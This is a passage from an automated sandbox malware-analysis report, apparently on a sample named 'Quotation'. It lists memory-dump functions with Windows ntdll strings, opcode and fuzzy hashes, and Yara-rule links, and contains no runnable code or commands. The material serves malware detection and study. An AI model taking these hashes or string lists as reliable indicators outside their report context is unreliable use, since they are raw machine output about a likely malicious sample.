                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                              • API String ID: 0-1340214556
                                                              • Opcode ID: aff9436967809f0f8653009c61d67b37fe10e7d25f4f50e19fbaf9c60e7c10ad
                                                              • Instruction ID: 0d797e37c301ac394449bfef0efbbc37af0ed5c6bff5754e9350475f5fc9d470
                                                              • Opcode Fuzzy Hash: aff9436967809f0f8653009c61d67b37fe10e7d25f4f50e19fbaf9c60e7c10ad
                                                              • Instruction Fuzzy Hash: 04512475A00784EFE312CBA8D994FAABBF8FF49744F0405A0E5808F6A2D774E911CB50
                                                              Function 33E816CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrtls.c, xrefs: 33EC1B4A
                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 33EC1B39
                                                              • LdrpAllocateTls, xrefs: 33EC1B40
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                              • API String ID: 0-4274184382
                                                              • Opcode ID: b59c2c2142a94331d81b68ea93ec0b7225d4ff5973ab21fb0e239245123b04e1
                                                              • Instruction ID: 44cc64d2abf9a5bdf0dc8048ca7c9459afcd28d246c3841ac6ddb2148dbc81d4
                                                              • Opcode Fuzzy Hash: b59c2c2142a94331d81b68ea93ec0b7225d4ff5973ab21fb0e239245123b04e1
                                                              • Instruction Fuzzy Hash: 804198B9E11648EFDB01CFA8C940AAEBBF5FF48714F448119E40AAB650DB75A800CB90
                                                              Function 33F0C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • PreferredUILanguages, xrefs: 33F0C212
                                                              • @, xrefs: 33F0C1F1
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 33F0C1C5
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: 2025c4ff667f6dfbf085c99c9a32b6c8ed6bcc93144b8c9c65b487782d9d22d1
                                                              • Instruction ID: d83c22e6e37b5875245fa0a88383746ee3203936bedf1e929f751675b8471c8d
                                                              • Opcode Fuzzy Hash: 2025c4ff667f6dfbf085c99c9a32b6c8ed6bcc93144b8c9c65b487782d9d22d1
                                                              • Instruction Fuzzy Hash: 5A418276E1020AEBDB01CBD8C880FDEB7BCAB04744F94446AE915FB690D7749A44DF90
                                                              Function 33EE4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: 609f2f2cdb87d26096a150fbf590ebd598e5464f092245ad0d20fd5f9dd6937f
                                                              • Instruction ID: d225fbdce5f35d828fa31afc64f294042cdb27c63a41782a95e529d98c17df33
                                                              • Opcode Fuzzy Hash: 609f2f2cdb87d26096a150fbf590ebd598e5464f092245ad0d20fd5f9dd6937f
                                                              • Instruction Fuzzy Hash: 4141D076D11758CBEB12CBA5C850B9DB7B8EF49384F15045AD940EBB91DB349981CF10
                                                              Function 33E5A2C3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PS3$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-1075811216
                                                              • Opcode ID: c45903050ca8d341691bae07a941ee8323e17d788c71565b7995627ca32487a0
                                                              • Instruction ID: 2e9d9d0fa45535f00d58e9299fc3b24eccb13353d4d228388d1d820889a49459
                                                              • Opcode Fuzzy Hash: c45903050ca8d341691bae07a941ee8323e17d788c71565b7995627ca32487a0
                                                              • Instruction Fuzzy Hash: B441AC75A04749DFEB12CF69C880B6E77B4FF94748F2440A9ED00DB2A1EA75E900CB91
                                                              Function 33E833A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() passed the empty activation context data, xrefs: 33EC29FE
                                                              • RtlCreateActivationContext, xrefs: 33EC29F9
                                                              • Actx , xrefs: 33E833AC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                              • API String ID: 0-859632880
                                                              • Opcode ID: 6232a9eb2cb0111c06e4ce1cf1d34a0ecbac615466a6400d7f001d601841d02c
                                                              • Instruction ID: 9f7dacb7163710ff776ef0582d6cc0b745abbd8f7ecd431154405ee248e683cf
                                                              • Opcode Fuzzy Hash: 6232a9eb2cb0111c06e4ce1cf1d34a0ecbac615466a6400d7f001d601841d02c
                                                              • Instruction Fuzzy Hash: 1631123AA10345DFEF26CF58D880B9A77A5EB44B24F554469EC0CDF2A2CB70D852CB90
                                                              Function 33ED20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializationFailure, xrefs: 33ED20FA
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 33ED2104
                                                              • Process initialization failed with status 0x%08lx, xrefs: 33ED20F3
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: 2ee3be8c2aa6c56ee408c6a32ad13355900959be76fe3797e91c020d7b712c9a
                                                              • Instruction ID: 1d3ed4fd780c16f1c9c130a68141dff755ffd7ab7b06c74807d53f3ff1eaa96f
                                                              • Opcode Fuzzy Hash: 2ee3be8c2aa6c56ee408c6a32ad13355900959be76fe3797e91c020d7b712c9a
                                                              • Instruction Fuzzy Hash: 87F0F675901308BFE710E649CD52FD937B8EB41758F9404A9F640B7681D6F0E942CE91
                                                              Function 33E603E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: 66092f1234361b18ff7165a41460f9276d1a7421c7b61dd9e8e1f7cc0d58a98d
                                                              • Instruction ID: 180be8be9aacfa47cf7664bc1a8cb81094c9f64c43d716c0962afe7ce0efeb4d
                                                              • Opcode Fuzzy Hash: 66092f1234361b18ff7165a41460f9276d1a7421c7b61dd9e8e1f7cc0d58a98d
                                                              • Instruction Fuzzy Hash: 84711A72E102499FDB01CFA8C990BAEB7F8EF08748F154065E905A7651EB38ED41CBA1
                                                              Function 33EF705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: kLsE
                                                              • API String ID: 3446177414-3058123920
                                                              • Opcode ID: b39dcd5ca4c7d0f2cab37a521c2232b92a4654279da5da3aa94a7229b8742c99
                                                              • Instruction ID: 8dac1800d09acadde6504442485133c4d17c1a0ddcd65a5540fed32071f3c563
                                                              • Opcode Fuzzy Hash: b39dcd5ca4c7d0f2cab37a521c2232b92a4654279da5da3aa94a7229b8742c99
                                                              • Instruction Fuzzy Hash: 2A4157729113404BE710BB60C8A0B653BF4AB507A8FD50629FC50BA1C1CBF688C7D7E0
                                                              Function 33E652A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@
                                                              • API String ID: 0-149943524
                                                              • Opcode ID: 72157e787937d3837d61f0a82597f5036e227e8258bfefdaef129caac2638466
                                                              • Instruction ID: 2b4bca78a742ccba90027af0216ac37fd2ee2dab368b7972dc5fb91535586f40
                                                              • Opcode Fuzzy Hash: 72157e787937d3837d61f0a82597f5036e227e8258bfefdaef129caac2638466
                                                              • Instruction Fuzzy Hash: B732AEB86483118BDB14CF14C48076EB7F5EF8878CF58492EF9A59B6A0E734D944CB92
                                                              Function 33E55702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: b30e4b250a2e84f0b7c8104c216b797b36f3258a089db730cb8803ac008fec14
                                                              • Instruction ID: 79ca7fc58996d893430e528ef6d9a40bb5c9a4cb5d46916fa4433b2f8b9a7488
                                                              • Opcode Fuzzy Hash: b30e4b250a2e84f0b7c8104c216b797b36f3258a089db730cb8803ac008fec14
                                                              • Instruction Fuzzy Hash: 5231CE35615B02EFEB429B60CA80A8AFBB9FF44358F441025E95197EA0DB74F920CBD0
                                                              Function 33F1A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: a150dbf9013359fb86cdfacef0ad9b1acb68e8546704c743ba75374fe62b00b7
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: 85C10072A183429BEB10CF24D840B6BBBE5AFC4358F884F2CF995CA290D775D525CB81
                                                              Function 33ECE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: b96046da3e31fbed4bc5277fd15e5d7aba32fb6ba05a6cbdf287aaece2db7f9b
                                                              • Instruction ID: 013cf80da662ae539d9de3079b6a1ea8ceab73f5713913eeb31ac84095ef678d
                                                              • Opcode Fuzzy Hash: b96046da3e31fbed4bc5277fd15e5d7aba32fb6ba05a6cbdf287aaece2db7f9b
                                                              • Instruction Fuzzy Hash: 55615CB2E003489FEB14CFA88940BADBBB9FB84345F54407DE558EB261DB31A940CB50
                                                              Function 33E6F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$$
                                                              • API String ID: 3446177414-233714265
                                                              • Opcode ID: 7f8ff3a0a89b60ae2585001d774d5dc8182e2c9cd5925630d395df0defcb3a7d
                                                              • Instruction ID: b8205657c8f6100974f31510099487a47d605583ce75667edfdf37fef877f717
                                                              • Opcode Fuzzy Hash: 7f8ff3a0a89b60ae2585001d774d5dc8182e2c9cd5925630d395df0defcb3a7d
                                                              • Instruction Fuzzy Hash: ED61BA75E44749DFEB20DFA4C580BA9B7B1BF4430CF4446A9E514ABA41CB74A982CB90
                                                              Function 33E8329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local\$@
                                                              • API String ID: 0-380025441
                                                              • Opcode ID: 3ee6bdde1517083dc076ceaaf7560974690cd8d5425236c4a6fca06e732d4333
                                                              • Instruction ID: 8412085f1accd025c554bf72d783b8a30dd39c0321ef57d92d8bbf845e284513
                                                              • Opcode Fuzzy Hash: 3ee6bdde1517083dc076ceaaf7560974690cd8d5425236c4a6fca06e732d4333
                                                              • Instruction Fuzzy Hash: 333186759497049FD311CF28C480A5FBBF8EB85A54F48092EF9EC97650DA34ED04CB92
                                                              Function 33E5C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              • Opcode ID: f8f9bc5d2b98f32e5829cb424502be01abf5de75d049fcbc88273f843131fdc2
                                                              • Instruction ID: c37161aacab5a90d53719f878d58421f2c8695b5746f1c6108bdf68a455d80b6
                                                              • Opcode Fuzzy Hash: f8f9bc5d2b98f32e5829cb424502be01abf5de75d049fcbc88273f843131fdc2
                                                              • Instruction Fuzzy Hash: 61824A79E003298FFB14CFA9C890BDEB7B5BF48354F548169E859AB250DB30D985CB50
                                                              Function 33EFA118 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 763c8a2a285b4e34188ea865e8763a01cd728fc2a5ff2f113655ad7a5eb532d9
                                                              • Instruction ID: 83bfdb8b84d8f4eebc1d4a1f264df5119aa86ff822ea88b76be89881a6e9304f
                                                              • Opcode Fuzzy Hash: 763c8a2a285b4e34188ea865e8763a01cd728fc2a5ff2f113655ad7a5eb532d9
                                                              • Instruction Fuzzy Hash: 3F22E2B82047518FEB14CF29C090776B7F1AF44B48F4A849AD8C68F285E7B6E552DF60
                                                              Function 33E51131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 3d4bc041b7b30e0d4d24f7390f11d1a2b19e1d7635d062f72373964c299574f3
                                                              • Instruction ID: 8e06a99dbd9f30fe7c5040e738ee05f5e48e738bddab1230fbd1f9b0e4e91dec
                                                              • Opcode Fuzzy Hash: 3d4bc041b7b30e0d4d24f7390f11d1a2b19e1d7635d062f72373964c299574f3
                                                              • Instruction Fuzzy Hash: 21B1F3B55093408FE754CF28C980A5ABBF1BF88308F584A6EF899DB351D771E946CB42
                                                              Function 33E57370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 339d545e540d4a3d991f4090d1c325954363f12227128e48a9fad3b2fc92fd9a
                                                              • Instruction ID: 03bba88e3bf36fae2f6b7e733a81cca5f8c1379318780cb95c854c1113557b36
                                                              • Opcode Fuzzy Hash: 339d545e540d4a3d991f4090d1c325954363f12227128e48a9fad3b2fc92fd9a
                                                              • Instruction Fuzzy Hash: 0BA169B5A08341CFE311CF28C480A1ABBFABF88358F14496EF58597350EB70E955CB92
                                                              Function 33E57703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6f978cc5734d6c0025841b6940023dd334165395c5e90ae538c095c0655d9a01
                                                              • Instruction ID: f2dc9e7e05f823a70994acfc921723eb8c64fc33099088f56bb5c56efe49f9d3
                                                              • Opcode Fuzzy Hash: 6f978cc5734d6c0025841b6940023dd334165395c5e90ae538c095c0655d9a01
                                                              • Instruction Fuzzy Hash: 46617075E04606EFEB08CF68C490A9DFBB5FF88344F18816AE419A7340DB34A951DBD0
                                                              Function 33ED07C3 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 83a1c727bb1138c7eb4435a34613b2ca373f41d91918b5d228d8d606b3f0c634
                                                              • Instruction ID: f09fcada5f43f849abbd327ef02b558dce64a20b42d1db89a086da03e360bec9
                                                              • Opcode Fuzzy Hash: 83a1c727bb1138c7eb4435a34613b2ca373f41d91918b5d228d8d606b3f0c634
                                                              • Instruction Fuzzy Hash: 05419FB69183409FD320DF29C844B9BBBE8FF88265F404A2EF598D7251DB749905CBD2
                                                              Function 33E557C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
